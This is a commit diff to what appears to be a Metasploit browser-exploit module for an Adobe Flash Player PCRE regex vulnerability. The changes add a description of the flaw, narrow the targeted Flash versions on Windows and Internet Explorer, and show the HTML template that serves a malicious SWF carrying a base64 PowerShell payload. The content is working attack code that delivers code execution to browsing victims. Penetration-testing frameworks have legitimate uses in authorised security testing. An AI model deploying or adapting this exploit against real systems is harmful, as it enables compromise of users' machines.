
Commit 2b19931

committed
Final
1 parent 2a25e2b commit 2b19931

1 file changed

+12
-17
lines changed

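--- a/modules/exploits/windows/browser/adobe_flash_pcre.rb
+++ b/modules/exploits/windows/browser/adobe_flash_pcre.rb
@@ -17,12 +17,15 @@ def initialize(info={})
 super(update_info(info,
 'Name' => "Adobe Flash Player PCRE Regex Vulnerability",
 'Description' => %q{
-Flash
+This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error
+in the PCRE engine, specifically in the handling of the \c escape sequence when followed by
+a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.
 },
 'License' => MSF_LICENSE,
 'Author' =>
 [
-'Mark Brand' # Found vuln
+'Mark Brand', # Found vuln
+'sinn3r' # MSF
 ],
 'References' =>
 [
@@ -37,8 +40,7 @@ def initialize(info={})
 },
 'DefaultOptions' =>
 {
-# 'InitialAutoRunScript' => 'migrate -f',
-'Retries' => false
+'Retries' => true
 },
 'Platform' => 'win',
 'BrowserRequirements' =>
@@ -48,7 +50,9 @@ def initialize(info={})
 :method => "LoadMovie",
 :os_name => OperatingSystems::Match::WINDOWS,
 :ua_name => Msf::HttpClients::IE,
-#:flash => lambda { |ver| ver =~ /^11\.5/ && ver < '11.5.502.149' }
+# Ohter versions are vulnerable but .235 is the one that works for me pretty well
+# So we're gonna limit to this one for now. More validation needed in the future.
+:flash => lambda { |ver| ver =~ /^16\./ && ver <= '16.0.0.235' }
 },
 'Targets' =>
 [
@@ -60,6 +64,8 @@ def initialize(info={})
 end
 
 def exploit
+# Please see data/exploits/CVE-2015-0318/ for source,
+# that's where the actual exploit is
 @swf = create_swf
 super
 end
@@ -81,7 +87,6 @@ def on_request_exploit(cli, request, target_info)
 end
 
 def exploit_template(cli, target_info)
-
 swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
 target_payload = get_payload(cli, target_info)
 psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
@@ -96,18 +101,8 @@ def exploit_template(cli, target_info)
 <param name="Play" value="true" />
 <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
 </object>
-
-<script>
-function debug_alert(msg) {
-console.log(msg);
-}
-
-function debug_print(msg) {
-console.log(msg);
-}
-</script>
 </body>
-</html>
+</html>
 |
 
 return html_template, binding()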
